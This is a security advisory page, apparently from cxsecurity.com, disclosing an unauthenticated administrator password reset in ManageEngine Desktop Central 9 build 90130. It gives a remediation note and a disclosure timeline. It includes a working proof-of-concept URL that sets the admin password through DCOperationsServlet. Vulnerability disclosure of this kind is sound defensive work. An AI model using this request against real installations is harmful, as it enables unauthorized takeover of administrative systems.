Manage Engine Desktop Central 9 Unauthorized Administrative Password Reset

2015.03.28
Credit: Anonymous
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

A vulnerability exists in the Manage Engine Desktop Central 9 application that affects version (build 90130). This may affect earlier releases as well. The vulnerability allows a remote unauthenticated user to change the password of any Manage Engine Desktop Central user with the Administrator role (DCAdmin). The following proof of concept URL changes the admin user password to admin3. http://<IP>:8020/servlets/DCOperationsServlet?operation=addOrModifyUser&roleId=DCAdmin&userName=admin&password=admin3 The XML response suggests the user modification failed, however a user can perform a successful login with the supplied credentials: <operation> <operationstatus>Failure</operationstatus> <message>Problem while modifying user admin in DC.</message> </operation> Complete control of the application can now be obtained by an unauthorised user. Vulnerability remediation: This vulnerability was fixed in Desktop Central build 90135. Refer to the vendor advisory for product update information and instructions. Vendor advisory: https://www.manageengine.com/products/desktop-central/unauthorized-admin-credential-modification.html Disclosure timeline: Vendor notification: 02/02/2015 Follow up with Vendor: 16/02/2015 Fixed released: 18/02/2015 CVE requested: 06/03/2015 CVE assigned: 20/03/2015 Vendor notification: 24/03/2015 Public disclosure: 27/03/2015

References:

https://www.manageengine.com/products/desktop-central/unauthorized-admin-credential-modification.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top